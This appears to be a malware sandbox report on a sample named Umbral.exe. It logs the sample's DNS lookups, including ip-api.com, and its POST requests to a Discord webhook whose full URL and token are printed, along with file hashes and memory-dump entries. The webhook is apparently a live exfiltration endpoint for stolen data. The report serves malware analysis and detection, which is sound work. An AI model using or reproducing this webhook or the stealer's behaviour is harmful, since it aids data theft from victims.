      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=
      tls, http2
      2.0kB
       9.4kB
       22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

      HTTP Response

      204
    • 162.159.128.233:443
      https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw
      tls, http
      Umbral.exe
      444.3kB
       10.6kB
       340
      78

      HTTP Request

      POST https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw

      HTTP Response

      204

      HTTP Request

      POST https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw

      HTTP Response

      200
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.4kB
       7.4kB
       18
      13
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.4kB
       7.4kB
       18
      13
    • 150.171.27.10:443
      https://tse1.mm.bing.net/th?id=OADD2.10239339388162_1MFS3CT3ZOVTF7TJA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      tls, http2
      152.8kB
       4.4MB
       3218
      3208

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239339388161_17PDPNJBHCJYF0MEC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239339388162_1MFS3CT3ZOVTF7TJA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Response

      200
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.4kB
       7.4kB
       18
      13
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.4kB
       7.4kB
       18
      13
    • 142.250.179.227:80
      http://c.pki.goog/r/r1.crl
      http
      476 B
       394 B
       6
      4

      HTTP Request

      GET http://c.pki.goog/r/r1.crl

      HTTP Response

      304
    • 8.8.8.8:53
      gstatic.com
      dns
      Umbral.exe
      57 B
       73 B
       1
      1

      DNS Request

      gstatic.com

      DNS Response

      142.250.187.227

    • 8.8.8.8:53
      ip-api.com
      dns
      Umbral.exe
      56 B
       72 B
       1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
       148 B
       1
      1

      DNS Request

      g.bing.com

      DNS Response

      150.171.27.10
      150.171.28.10

    • 8.8.8.8:53
      discord.com
      dns
      Umbral.exe
      57 B
       137 B
       1
      1

      DNS Request

      discord.com

      DNS Response

      162.159.128.233
      162.159.138.232
      162.159.135.232
      162.159.136.232
      162.159.137.232

    • 8.8.8.8:53
      tse1.mm.bing.net
      dns
      62 B
       170 B
       1
      1

      DNS Request

      tse1.mm.bing.net

      DNS Response

      150.171.27.10
      150.171.28.10

    • 8.8.8.8:53
      c.pki.goog
      dns
      56 B
       107 B
       1
      1

      DNS Request

      c.pki.goog

      DNS Response

      142.250.179.227

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      efa4168b73a5e8ae56d49bcac4d67861

      SHA1

      b3fe6b2d9fc05ad7892a2c8b96914764336b3067

      SHA256

      7aab157fba3a543647a38cc8729ffb962a58cc2093d94566c9e68ff73d134dca

      SHA512

      a1f305eac9c73c951f22e76f3904c1c6bb518b12d8a74bbea544c845f3d592e7915ec47d6531a3a4e669f6ab12311f3a632ff47a68f36370111d1c82cf8b6e99

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      c65738617888921a153bd9b1ef516ee7

      SHA1

      5245e71ea3c181d76320c857b639272ac9e079b1

      SHA256

      4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

      SHA512

      2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      276798eeb29a49dc6e199768bc9c2e71

      SHA1

      5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

      SHA256

      cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

      SHA512

      0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      d8a781a8d47e148c742681deaa63ac8d

      SHA1

      49594c22cc6183605b96b715a0c00c1bf1bbb468

      SHA256

      994622f9d048bce32fd23dec62a532b965883a169722f36ce72a639e29b8303c

      SHA512

      f32989be9a903764c4ed3b8ab4e61a677ca4d37031200530164d192c25c269143cb127a73380ea0d88ac81f1a3a7c141d77fbd74c211c9d969bf2af9202e7fbe

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_chfmu3n4.qtf.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/4004-70-0x000001821EF70000-0x000001821EF7A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4004-34-0x000001821EE60000-0x000001821EE7E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4004-90-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4004-89-0x000001821F040000-0x000001821F1E9000-memory.dmp

      Filesize

      1.7MB

      Download

    • memory/4004-2-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4004-32-0x000001821EEE0000-0x000001821EF56000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4004-33-0x000001821EE90000-0x000001821EEE0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4004-71-0x000001821EFA0000-0x000001821EFB2000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4004-1-0x00000182047C0000-0x0000018204800000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4004-0-0x00007FF9B00B3000-0x00007FF9B00B5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/6060-14-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/6060-15-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/6060-13-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/6060-12-0x000001EB78F20000-0x000001EB78F42000-memory.dmp

      Filesize

      136KB

      Download

    • memory/6060-18-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.